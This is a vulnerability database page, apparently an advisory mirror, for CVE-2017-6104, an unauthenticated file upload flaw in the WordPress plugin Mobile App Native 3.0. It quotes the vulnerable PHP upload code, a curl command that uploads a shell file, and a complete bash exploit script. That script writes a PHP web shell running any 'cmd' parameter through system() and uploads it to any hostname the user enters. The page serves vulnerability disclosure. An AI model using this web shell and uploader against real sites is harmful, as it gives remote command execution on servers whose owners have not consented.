Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugMYMSSV:92730
HistoryMar 03, 2017 - 12:00 a.m.

Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

2017-03-0300:00:00
MYM
www.seebug.org
19

0.003 Low

EPSS

Percentile

69.6%

JSON

./ zen-mobile-app-native/server/images.php code for missing authentication

Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.

Vulnerability: The code in the file

./ zen-mobile-app-native/server/images.php doesn’t require authentication or check that the user is allowed to upload content. It also doesn’t sanitize the file upload against executable code. `` <? php //header(‘content-type: text/html; charset=iso-8859-2’); header(‘Content-Type: text/html; charset=utf-8’); header(‘Access-Control-Allow-Origin: *’); require_once(‘function.php’);

 if ($_FILES['file']['name']) {
 if (!$ _FILES['file']['error']) {
 $name = md5(rand(100, 200));
 $ext = explode('.', $_FILES['file']['name']);
 $filename = $name . '.' . $ext[1];
 $destination = 'images/' . $filename;
 $location = $_FILES["file"]["tmp_name"];
 move_uploaded_file($location, $destination);
 echo $plugin_url.'/ server/images/' . $filename;
}
 else {
 echo $message = 'Ooops! Your upload triggered the following error: '.$ _FILES['file']['error'];
}
}

``

CVEIDs: CVE-2017-6104 Trojan: $ curl-F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"; http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh


                                                #!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
 echo -e ${red};
 echo -e "		Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "					3/1/2017";
 echo "			   Larry W. Cashdollar, @_larry0";
 echo
 echo "				  CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done

Related

cvelist 1
wpexploit 1
prion 1
cve 1
nvd 1
packetstorm 2
wpvulndb 1
exploitpack 1
exploitdb 1
cvelist
cvelist
CVE-2017-6104
2017-03-02 22:00:00
wpexploit
wpexploit
Mobile App Native <= 3.0 - Remote File Upload
2017-02-28 00:00:00
prion
prion
Design/Logic Flaw
2017-03-02 22:59:00
cve
cve
CVE-2017-6104
2017-03-02 22:59:00
nvd
nvd
CVE-2017-6104
2017-03-02 22:59:00
packetstorm
packetstorm
WordPress Mobile App Native 3.0 Shell Upload
2017-03-02 00:00:00
WordPress Multiple Plugin File Upload
2017-03-17 00:00:00
wpvulndb
wpvulndb
Mobile App Native <= 3.0 - Remote File Upload
2017-02-28 00:00:00
exploitpack
exploitpack
WordPress Multiple Plugins - Arbitrary File Upload
2017-03-03 00:00:00
exploitdb
exploitdb
Multiple WordPress Plugins - Arbitrary File Upload
2017-03-03 00:00:00

0.003 Low

EPSS

Percentile

69.6%

JSON
Related for SSV:92730
cvelist1wpexploit1prion1cve1nvd1packetstorm2wpvulndb1exploitpack1exploitdb1